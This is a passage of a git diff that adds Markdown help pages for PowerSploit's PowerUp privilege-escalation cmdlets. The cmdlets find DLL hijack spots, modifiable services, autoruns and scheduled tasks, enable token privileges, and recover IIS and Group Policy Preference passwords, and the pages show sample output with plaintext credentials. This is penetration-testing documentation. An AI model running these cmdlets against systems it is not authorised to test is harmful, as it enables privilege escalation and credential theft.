+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Hourly

+Starts the payload hourly.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: ScheduledTaskHourly

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -At

+Starts the payload at the specified time.

+You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.

+

+```yaml

+Type: DateTime

+Parameter Sets: ScheduledTaskDaily

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -OnIdle

+Starts the payload after one minute of idling.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: ScheduledTaskOnIdle

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -AtLogon

+Starts the payload upon any user logon.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: Registry

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.exploit-monday.com](http://www.exploit-monday.com)

+

diff --git a/docs/Privesc/Add-ServiceDacl.md b/docs/Privesc/Add-ServiceDacl.md
new file mode 100755
index 0000000..13e4d64
--- /dev/null
+++ b/docs/Privesc/Add-ServiceDacl.md
@@ -0,0 +1,68 @@
+# Add-ServiceDacl

+

+## SYNOPSIS

+Adds a Dacl field to a service object returned by Get-Service.

+

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect

+

+## SYNTAX

+

+```

+Add-ServiceDacl [-Name] <String[]>

+```

+

+## DESCRIPTION

+Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a

+Dacl field to each object.

+It does this by opening a handle with ReadControl for the

+service with using the GetServiceHandle Win32 API call and then uses

+QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-Service | Add-ServiceDacl

+```

+

+Add Dacls for every service the current user can read.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-Service -Name VMTools | Add-ServiceDacl

+```

+

+Add the Dacl to the VMTools service object.

+

+## PARAMETERS

+

+### -Name

+An array of one or more service names to add a service Dacl for.

+Passable on the pipeline.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: ServiceName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### ServiceProcess.ServiceController

+

+## NOTES

+

+## RELATED LINKS

+

+[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)

+

diff --git a/docs/Privesc/Enable-Privilege.md b/docs/Privesc/Enable-Privilege.md
new file mode 100755
index 0000000..6de9c43
--- /dev/null
+++ b/docs/Privesc/Enable-Privilege.md
@@ -0,0 +1,105 @@
+# Enable-Privilege

+

+## SYNOPSIS

+Enables a specific privilege for the current process.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect

+

+## SYNTAX

+

+```

+Enable-Privilege [-Privilege] <String[]>

+```

+

+## DESCRIPTION

+Uses RtlAdjustPrivilege to enable a specific privilege for the current process.

+Privileges can be passed by string, or the output from Get-ProcessTokenPrivilege

+can be passed on the pipeline.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ProcessTokenPrivilege

+```

+

+Privilege                    Attributes                     ProcessId

+                    ---------                    ----------                     ---------

+          SeShutdownPrivilege                      DISABLED                          3620

+      SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED                          3620

+            SeUndockPrivilege                      DISABLED                          3620

+SeIncreaseWorkingSetPrivilege                      DISABLED                          3620

+          SeTimeZonePrivilege                      DISABLED                          3620

+

+Enable-Privilege SeShutdownPrivilege

+

+Get-ProcessTokenPrivilege

+

+                    Privilege                    Attributes                     ProcessId

+                    ---------                    ----------                     ---------

+          SeShutdownPrivilege          SE_PRIVILEGE_ENABLED                          3620

+      SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED                          3620

+            SeUndockPrivilege                      DISABLED                          3620

+SeIncreaseWorkingSetPrivilege                      DISABLED                          3620

+          SeTimeZonePrivilege                      DISABLED                          3620

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-ProcessTokenPrivilege

+```

+

+Privilege                                        Attributes                     ProcessId

+---------                                        ----------                     ---------

+SeShutdownPrivilege                                DISABLED                          2828

+SeChangeNotifyPrivilege       ...AULT, SE_PRIVILEGE_ENABLED                          2828

+SeUndockPrivilege                                  DISABLED                          2828

+SeIncreaseWorkingSetPrivilege                      DISABLED                          2828

+SeTimeZonePrivilege                                DISABLED                          2828

+

+

+Get-ProcessTokenPrivilege | Enable-Privilege -Verbose

+VERBOSE: Attempting to enable SeShutdownPrivilege

+VERBOSE: Attempting to enable SeChangeNotifyPrivilege

+VERBOSE: Attempting to enable SeUndockPrivilege

+VERBOSE: Attempting to enable SeIncreaseWorkingSetPrivilege

+VERBOSE: Attempting to enable SeTimeZonePrivilege

+

+Get-ProcessTokenPrivilege

+

+Privilege                                        Attributes                     ProcessId

+---------                                        ----------                     ---------

+SeShutdownPrivilege                    SE_PRIVILEGE_ENABLED                          2828

+SeChangeNotifyPrivilege       ...AULT, SE_PRIVILEGE_ENABLED                          2828

+SeUndockPrivilege                      SE_PRIVILEGE_ENABLED                          2828

+SeIncreaseWorkingSetPrivilege          SE_PRIVILEGE_ENABLED                          2828

+SeTimeZonePrivilege                    SE_PRIVILEGE_ENABLED                          2828

+

+## PARAMETERS

+

+### -Privilege

+{{Fill Privilege Description}}

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: Privileges

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

+[http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html](http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html)

+

diff --git a/docs/Privesc/Find-PathDLLHijack.md b/docs/Privesc/Find-PathDLLHijack.md
new file mode 100755
index 0000000..f43fc69
--- /dev/null
+++ b/docs/Privesc/Find-PathDLLHijack.md
@@ -0,0 +1,45 @@
+# Find-PathDLLHijack

+

+## SYNOPSIS

+Finds all directories in the system %PATH% that are modifiable by the current user.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-ModifiablePath

+

+## SYNTAX

+

+```

+Find-PathDLLHijack

+```

+

+## DESCRIPTION

+Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath

+to return the folder paths the current user can write to.

+On Windows 7, if wlbsctrl.dll is

+written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search

+order loading.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-PathDLLHijack

+```

+

+Finds all %PATH% .DLL hijacking opportunities.

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.HijackableDLL.Path

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738)

+

diff --git a/docs/Privesc/Find-ProcessDLLHijack.md b/docs/Privesc/Find-ProcessDLLHijack.md
new file mode 100755
index 0000000..bbece58
--- /dev/null
+++ b/docs/Privesc/Find-ProcessDLLHijack.md
@@ -0,0 +1,127 @@
+# Find-ProcessDLLHijack

+

+## SYNOPSIS

+Finds all DLL hijack locations for currently running processes.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Find-ProcessDLLHijack [[-Name] <String[]>] [-ExcludeWindows] [-ExcludeProgramFiles] [-ExcludeOwned]

+```

+

+## DESCRIPTION

+Enumerates all currently running processes with Get-Process (or accepts an

+input process object from Get-Process) and enumerates the loaded modules for each.

+All loaded module name exists outside of the process binary base path, as those

+are DLL load-order hijack candidates.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-ProcessDLLHijack

+```

+

+Finds possible hijackable DLL locations for all processes.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-Process VulnProcess | Find-ProcessDLLHijack

+```

+

+Finds possible hijackable DLL locations for the 'VulnProcess' processes.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles

+```

+

+Finds possible hijackable DLL locations not in C:\Windows\* and

+not in C:\Program Files\* or C:\Program Files (x86)\*

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Find-ProcessDLLHijack -ExcludeOwned

+```

+

+Finds possible hijackable DLL location for processes not owned by the

+current user.

+

+## PARAMETERS

+

+### -Name

+The name of a process to enumerate for possible DLL path hijack opportunities.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: ProcessName

+

+Required: False

+Position: 1

+Default value: $(Get-Process | Select-Object -Expand Name)

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -ExcludeWindows

+Exclude paths from C:\Windows\* instead of just C:\Windows\System32\*

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ExcludeProgramFiles

+Exclude paths from C:\Program Files\* and C:\Program Files (x86)\*

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ExcludeOwned

+Exclude processes the current user owns.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.HijackableDLL.Process

+

+## NOTES

+

+## RELATED LINKS

+

+[https://www.mandiant.com/blog/malware-persistence-windows-registry/](https://www.mandiant.com/blog/malware-persistence-windows-registry/)

+

diff --git a/docs/Privesc/Get-ApplicationHost.md b/docs/Privesc/Get-ApplicationHost.md
new file mode 100755
index 0000000..44d07d7
--- /dev/null
+++ b/docs/Privesc/Get-ApplicationHost.md
@@ -0,0 +1,95 @@
+# Get-ApplicationHost

+

+## SYNOPSIS

+Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system.

+

+Author: Scott Sutherland  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-ApplicationHost

+```

+

+## DESCRIPTION

+This script will decrypt and recover application pool and virtual directory passwords

+from the applicationHost.config file on the system. 

+The output supports the

+pipeline which can be used to convert all of the results into a pretty table by piping

+to format-table.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Return application pool and virtual directory passwords from the applicationHost.config on the system.

+```

+

+Get-ApplicationHost

+

+user    : PoolUser1

+pass    : PoolParty1!

+type    : Application Pool

+vdir    : NA

+apppool : ApplicationPool1

+user    : PoolUser2

+pass    : PoolParty2!

+type    : Application Pool

+vdir    : NA

+apppool : ApplicationPool2

+user    : VdirUser1

+pass    : VdirPassword1!

+type    : Virtual Directory

+vdir    : site1/vdir1/

+apppool : NA

+user    : VdirUser2

+pass    : VdirPassword2!

+type    : Virtual Directory

+vdir    : site2/

+apppool : NA

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Return a list of cleartext and decrypted connect strings from web.config files.

+```

+

+Get-ApplicationHost | Format-Table -Autosize

+

+user          pass               type              vdir         apppool

+----          ----               ----              ----         -------

+PoolUser1     PoolParty1! 

+Application Pool   NA           ApplicationPool1

+PoolUser2     PoolParty2! 

+Application Pool   NA           ApplicationPool2

+VdirUser1     VdirPassword1! 

+Virtual Directory  site1/vdir1/ NA

+VdirUser2     VdirPassword2! 

+Virtual Directory  site2/       NA

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+### System.Data.DataTable

+

+System.Boolean

+

+## NOTES

+Author: Scott Sutherland - 2014, NetSPI

+Version: Get-ApplicationHost v1.0

+Comments: Should work on IIS 6 and Above

+

+## RELATED LINKS

+

+[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1

+http://www.netspi.com

+http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe

+http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1

+http://www.netspi.com

+http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe

+http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx)

+

diff --git a/docs/Privesc/Get-CachedGPPPassword.md b/docs/Privesc/Get-CachedGPPPassword.md
new file mode 100755
index 0000000..2169a15
--- /dev/null
+++ b/docs/Privesc/Get-CachedGPPPassword.md
@@ -0,0 +1,55 @@
+# Get-CachedGPPPassword

+

+## SYNOPSIS

+Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and

+left in cached files on the host.

+

+Author: Chris Campbell (@obscuresec)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-CachedGPPPassword

+```

+

+## DESCRIPTION

+Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and

+datasources.xml files and returns plaintext passwords.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-CachedGPPPassword

+```

+

+NewName   : \[BLANK\]

+Changed   : {2013-04-25 18:36:07}

+Passwords : {Super!!!Password}

+UserNames : {SuperSecretBackdoor}

+File      : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7

+            C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr

+            oups.xml

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html

+https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1

+https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb

+http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

+http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html

+https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1

+https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb

+http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

+http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html)

+

diff --git a/docs/Privesc/Get-ModifiablePath.md b/docs/Privesc/Get-ModifiablePath.md
new file mode 100755
index 0000000..2a1118f
--- /dev/null
+++ b/docs/Privesc/Get-ModifiablePath.md
@@ -0,0 +1,102 @@
+# Get-ModifiablePath

+

+## SYNOPSIS

+Parses a passed string containing multiple possible file/folder paths and returns

+the file paths where the current user has modification rights.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-ModifiablePath [-Path] <String[]> [-Literal]

+```

+

+## DESCRIPTION

+Takes a complex path specification of an initial file/folder path with possible

+configuration files, 'tokenizes' the string in a number of possible ways, and

+enumerates the ACLs for each path that currently exists on the system.

+Any path that

+the current user has modification rights on is returned in a custom object that contains

+the modifiable path, associated permission set, and the IdentityReference with the specified

+rights.

+The SID of the current user and any group he/she are a part of are used as the

+comparison set against the parsed path DACLs.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+'"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath

+```

+

+Path                       Permissions                IdentityReference

+----                       -----------                -----------------

+C:\Temp\blah.exe           {ReadAttributes, ReadCo...

+NT AUTHORITY\Authentic...

+C:\Temp\config.ini         {ReadAttributes, ReadCo...

+NT AUTHORITY\Authentic...

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath

+```

+

+Path                       Permissions                IdentityReference

+----                       -----------                -----------------

+C:\Vuln\blah.bat           {ReadAttributes, ReadCo...

+NT AUTHORITY\Authentic...

+C:\Vuln\config.ini         {ReadAttributes, ReadCo...

+NT AUTHORITY\Authentic...

+...

+

+## PARAMETERS

+

+### -Path

+The string path to parse for modifiable files.

+Required

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: FullName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Literal

+Switch.

+Treat all paths as literal (i.e.

+don't do 'tokenization').

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: LiteralPaths

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.TokenPrivilege.ModifiablePath

+

+Custom PSObject containing the Permissions, ModifiablePath, IdentityReference for

+a modifiable path.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Get-ModifiableRegistryAutoRun.md b/docs/Privesc/Get-ModifiableRegistryAutoRun.md
new file mode 100755
index 0000000..23314f9
--- /dev/null
+++ b/docs/Privesc/Get-ModifiableRegistryAutoRun.md
@@ -0,0 +1,44 @@
+# Get-ModifiableRegistryAutoRun

+

+## SYNOPSIS

+Returns any elevated system autoruns in which the current user can

+modify part of the path string.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-ModifiablePath

+

+## SYNTAX

+

+```

+Get-ModifiableRegistryAutoRun

+```

+

+## DESCRIPTION

+Enumerates a number of autorun specifications in HKLM and filters any

+autoruns through Get-ModifiablePath, returning any file/config locations

+in the found path strings that the current user can modify.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ModifiableRegistryAutoRun

+```

+

+Return vulneable autorun binaries (or associated configs).

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.ModifiableRegistryAutoRun

+

+Custom PSObject containing results.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Get-ModifiableScheduledTaskFile.md b/docs/Privesc/Get-ModifiableScheduledTaskFile.md
new file mode 100755
index 0000000..4e48cc4
--- /dev/null
+++ b/docs/Privesc/Get-ModifiableScheduledTaskFile.md
@@ -0,0 +1,45 @@
+# Get-ModifiableScheduledTaskFile

+

+## SYNOPSIS

+Returns scheduled tasks where the current user can modify any file

+in the associated task action string.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-ModifiablePath

+

+## SYNTAX

+

+```

+Get-ModifiableScheduledTaskFile

+```

+

+## DESCRIPTION

+Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks"

+and parses the XML specification for each task, extracting the command triggers.

+Each trigger string is filtered through Get-ModifiablePath, returning any file/config

+locations in the found path strings that the current user can modify.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ModifiableScheduledTaskFile

+```

+

+Return scheduled tasks with modifiable command strings.

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.ModifiableScheduledTaskFile

+

+Custom PSObject containing results.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Get-ModifiableService.md b/docs/Privesc/Get-ModifiableService.md
new file mode 100755
index 0000000..92eeb81
--- /dev/null
+++ b/docs/Privesc/Get-ModifiableService.md
@@ -0,0 +1,40 @@
+# Get-ModifiableService

+

+## SYNOPSIS

+Enumerates all services and returns services for which the current user can modify the binPath.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail

+

+## SYNTAX

+

+```

+Get-ModifiableService

+```

+

+## DESCRIPTION

+Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if

+the current user has rights to change the service configuration.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ModifiableService

+```

+

+Get a set of potentially exploitable services.

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.ModifiablePath

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Get-ModifiableServiceFile.md b/docs/Privesc/Get-ModifiableServiceFile.md
new file mode 100755
index 0000000..ab01e42
--- /dev/null
+++ b/docs/Privesc/Get-ModifiableServiceFile.md
@@ -0,0 +1,45 @@
+# Get-ModifiableServiceFile

+

+## SYNOPSIS

+Enumerates all services and returns vulnerable service files.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath

+

+## SYNTAX

+

+```

+Get-ModifiableServiceFile

+```

+

+## DESCRIPTION

+Enumerates all services by querying the WMI win32_service class.

+For each service,

+it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine

+if the current user has rights to modify the service binary itself or any associated

+arguments.

+If the associated binary (or any configuration files) can be overwritten,

+privileges may be able to be escalated.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ModifiableServiceFile

+```

+

+Get a set of potentially exploitable service binares/config files.

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.ModifiablePath

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Get-ProcessTokenGroup.md b/docs/Privesc/Get-ProcessTokenGroup.md
new file mode 100755
index 0000000..e52533c
--- /dev/null
+++ b/docs/Privesc/Get-ProcessTokenGroup.md
@@ -0,0 +1,114 @@
+# Get-ProcessTokenGroup

+

+## SYNOPSIS

+Returns all SIDs that the current token context is a part of, whether they are disabled or not.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect, Get-TokenInformation

+

+## SYNTAX

+

+```

+Get-ProcessTokenGroup [[-Id] <UInt32>]

+```

+

+## DESCRIPTION

+First, if a process ID is passed, then the process is opened using OpenProcess(),

+otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.

+OpenProcessToken() is then used to get a handle to the specified process token.

+The token

+is then passed to Get-TokenInformation to query the current token groups for the specified

+token.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ProcessTokenGroup

+```

+

+SID                                              Attributes                     ProcessId

+---                                              ----------                     ---------

+S-1-5-21-890171859-3433809...

+..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-1-0                       ..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-5-32-544                     SE_GROUP_USE_FOR_DENY_ONLY                          1372

+S-1-5-32-545                  ..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-5-4                       ..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-2-1                       ..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-5-11                      ..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-5-15                      ..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-5-5-0-419601              ...SE_GROUP_INTEGRITY_ENABLED                          1372

+S-1-2-0                       ..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-5-21-890171859-3433809...

+..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-5-21-890171859-3433809...

+..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-5-21-890171859-3433809...

+..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-18-1                      ..._DEFAULT, SE_GROUP_ENABLED                          1372

+S-1-16-8192                                                                          1372

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-Process notepad | Get-ProcessTokenGroup

+```

+

+SID                                              Attributes                     ProcessId

+---                                              ----------                     ---------

+S-1-5-21-890171859-3433809...

+..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-1-0                       ..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-5-32-544                     SE_GROUP_USE_FOR_DENY_ONLY                          2640

+S-1-5-32-545                  ..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-5-4                       ..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-2-1                       ..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-5-11                      ..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-5-15                      ..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-5-5-0-419601              ...SE_GROUP_INTEGRITY_ENABLED                          2640

+S-1-2-0                       ..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-5-21-890171859-3433809...

+..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-5-21-890171859-3433809...

+..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-5-21-890171859-3433809...

+..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-18-1                      ..._DEFAULT, SE_GROUP_ENABLED                          2640

+S-1-16-8192                                                                          2640

+

+## PARAMETERS

+

+### -Id

+The process ID to enumerate token groups for, otherwise defaults to the current process.

+

+```yaml

+Type: UInt32

+Parameter Sets: (All)

+Aliases: ProcessID

+

+Required: False

+Position: 1

+Default value: 0

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.TokenGroup

+

+Outputs a custom object containing the token group (SID/attributes) for the specified token if

+"-InformationClass 'Groups'" is passed.

+

+PowerUp.TokenPrivilege

+

+Outputs a custom object containing the token privilege (name/attributes) for the specified token if

+"-InformationClass 'Privileges'" is passed

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Get-ProcessTokenPrivilege.md b/docs/Privesc/Get-ProcessTokenPrivilege.md
new file mode 100755
index 0000000..9f835f2
--- /dev/null
+++ b/docs/Privesc/Get-ProcessTokenPrivilege.md
@@ -0,0 +1,131 @@
+# Get-ProcessTokenPrivilege

+

+## SYNOPSIS

+Returns all privileges for the current (or specified) process ID.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect, Get-TokenInformation

+

+## SYNTAX

+

+```

+Get-ProcessTokenPrivilege [[-Id] <UInt32>] [-Special]

+```

+

+## DESCRIPTION

+First, if a process ID is passed, then the process is opened using OpenProcess(),

+otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.

+OpenProcessToken() is then used to get a handle to the specified process token.

+The token

+is then passed to Get-TokenInformation to query the current privileges for the specified

+token.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ProcessTokenPrivilege

+```

+

+Privilege                    Attributes                     ProcessId

+                    ---------                    ----------                     ---------

+          SeShutdownPrivilege                      DISABLED                          2600

+      SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED                          2600

+            SeUndockPrivilege                      DISABLED                          2600

+SeIncreaseWorkingSetPrivilege                      DISABLED                          2600

+          SeTimeZonePrivilege                      DISABLED                          2600

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-ProcessTokenPrivilege -Special

+```

+

+Privilege                                  Attributes                 ProcessId

+---------                                  ----------                 ---------

+SeSecurityPrivilege                          DISABLED                      2444

+SeTakeOwnershipPrivilege                     DISABLED                      2444

+SeBackupPrivilege                            DISABLED                      2444

+SeRestorePrivilege                           DISABLED                      2444

+SeSystemEnvironmentPriv... 

+DISABLED                      2444

+SeImpersonatePrivilege     ...T, SE_PRIVILEGE_ENABLED                      2444

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-Process notepad | Get-ProcessTokenPrivilege | fl

+```

+

+Privilege  : SeShutdownPrivilege

+Attributes : DISABLED

+ProcessId  : 2640

+

+Privilege  : SeChangeNotifyPrivilege

+Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED

+ProcessId  : 2640

+

+Privilege  : SeUndockPrivilege

+Attributes : DISABLED

+ProcessId  : 2640

+

+Privilege  : SeIncreaseWorkingSetPrivilege

+Attributes : DISABLED

+ProcessId  : 2640

+

+Privilege  : SeTimeZonePrivilege

+Attributes : DISABLED

+ProcessId  : 2640

+

+## PARAMETERS

+

+### -Id

+The process ID to enumerate token groups for, otherwise defaults to the current process.

+

+```yaml

+Type: UInt32

+Parameter Sets: (All)

+Aliases: ProcessID

+

+Required: False

+Position: 1

+Default value: 0

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Special

+Switch.

+Only return 'special' privileges, meaning admin-level privileges.

+These include SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege,

+SeRestorePrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeTcbPrivilege.

+

+```yaml

+Type: SwitchParameter

